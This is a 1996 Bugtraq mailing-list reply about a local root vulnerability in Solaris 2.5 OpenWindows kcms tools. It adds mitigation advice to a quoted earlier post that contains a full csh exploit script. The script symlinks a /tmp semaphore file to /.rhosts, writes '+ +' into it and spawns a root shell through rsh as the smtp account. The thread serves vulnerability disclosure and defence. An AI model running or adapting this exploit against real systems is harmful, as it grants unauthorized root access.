[3017] in bugtraq
Re: Zolaris 2.5 Exploited.
daemon@ATHENA.MIT.EDU (Jungseok Roh)
Thu Jul 25 20:34:50 1996
Date: Fri, 26 Jul 1996 08:48:17 -0900
Reply-To: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: Jungseok Roh <beren@cosmos.kaist.ac.kr>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
In-Reply-To: <9607252300.AA22478@sol.acs.uwosh.edu> from "Brian T. Wightman"
at Jul 25, 96 06:00:08 pm
> I tried this posted exploit as well, and it does work (quite well, in
> fact).
>
> I have looked at this a little closer, and it appears that you can
> protect yourself from this hole by doing one of the following (these
> are just the quick patches, not involving changing the UID of root,
> installing a safer rshd, etc)
>
> 1) root# chmod gu-s /usr/openwin/bin/kcms_c*
>
> or
>
> 2) root# touch /.rhosts
> root# chown root:root /.rhosts
> root# chmod 600 /.rhosts
ln -s /dev/null /.rhosts is recommended.
" Divided Alive , Interconnected Dead. "
that's the proverb in internet Security. :)
>
> I am not going to say that this plugs the hole completely; I havn't
> had the time (and probably won't) or the experience to dig deeper into
> this. I will leave the deeper evaluation and patch to the experts.
>
> Brian
>
> P.S. If the followup to BUGTRAQ is inappropriate, my apologies.
>
> Brian T. Wightman Academic Computing, UW Oshkosh
> wightman@uwosh.edu 800 Algoma Blvd
> Phone: (414) 424-3020 Dempsey Hall 307
> http://www.uwosh.edu/faculty_staff/wightman/ Oshkosh, Wisconsin 54901
>
>
> In message <199607261337.EAA05783@cosmos.kaist.ac.kr>,
> Jungseok Roh wrote:
> > Wow.. I got a chance to use Ultra Sparc who runs Zolaris 2.5 several days ago
> > ~
> > then ONe of my senior told me that there might be a Funny ,also UNCONCEIVABLE
> > bugs in Openwindows.. I trusted him...
> > and I traversed the file system under /usr/openwin ..
> > there were just four SUIDed files .. ( if Admin installed openwin packages )
> > xlock , ff.core , kcms* .. Problem made less vague
> >
> > kcms_calibrate , kcms_configure is the objects we are approaching.
> > When examining the kcms families. I found a funny stuff .
> > kcms_configure makes the temporary(?) files in /tmp whoses permisson bit
> > is 666 ( Wow The sign of Devil ),, definately root owns it..
> > IT'S NAME is Kp_kcms_sys.sem !...
> > Then all u guys know the next procedure is .
> > hk.. I can't show u whole the procedure right now.
> > 'Cause My Zolaris machine is "Network Unreachible ...".
> > One Odd thin's are Exploitation Succeeds when it interacts with kcms_calibrat
> > e!!
> >
> > Major procedure is making the temporary files which linked to /.rhosts then
> > while kcms_configure tries to write /.rhosts make Thunder rolls using
> > kcms_calibrate and Make its power Powerful.. puha.. it's like seeing
> > Back To the Future III... then kcms_configure succeed its operation .
> > I made a simple script exploiting the machine who has that fatal bug.
> >
> > hmm..but I can't erase one curiosity ..
> > Why Sun made this humble mistake ? ... plz someboy notify this bug to SUN.
> > I don't know Her E-mail Address .. :)
> >
> > (what a simple!!) script follows .
> > this script shows u just PROCEDURE .. re-make on your demands .
> >
> > cat > uhit.sh << E_O_F
> > #!/bin/csh
> > # JungSeok. Roh ( beren@cosmos.kaist.ac.kr )
> > # Junior in KAIST undergraduate. Under Management Dep .
> >
> > set disp="cosmos.kaist.ac.kr:0.0"
> > setenv DISPLAY $disp
> > /bin/rm -rf /tmp/Kp_kcms_sys.sem
> > cd /tmp
> >
> > #Making symbolic link
> > ln -s /.rhosts Kp_kcms_sys.sem
> > /usr/openwin/bin/kcms_calibrate &
> >
> > while(1)
> >
> > echo "Click the device you've chosen in kcms_calibrate window"
> >
> > # Choose Any profiles .. hk..
> > # My 2.5 machine is unreachible son I can't get exact name of that profiles.
> > # What a fool I am.. jjap..
> > /usr/openwin/bin/kcms_configure -o -d $disp /usr/openwin/share/etc/devdata/pr
> > ofiles/Eksony17.mon
> >
> > if( -f /.rhosts ) then
> > echo -n "+ +" >> /.rhosts
> > # As u know , we can't login as root .. use smtp account. that has UID 0 !!
> > /usr/bin/rsh localhost -l smtp csh -i
> > endif
> > end
> > E_O_F
> >
> >
> > __
> >
> > There was a Legendary Security Task Force team whose Name is K/U/S ..
> > But BLOWED up by KOREAN National Prosecutor.. I hate them !! .......
> > They make me so sad .... Laughin' in bitter tears ... hk..hk..
> >
> > JungSeok Roh / Junior in KAIST / beren@cosmos.kaist.ac.kr / +82-42-869-5400
>
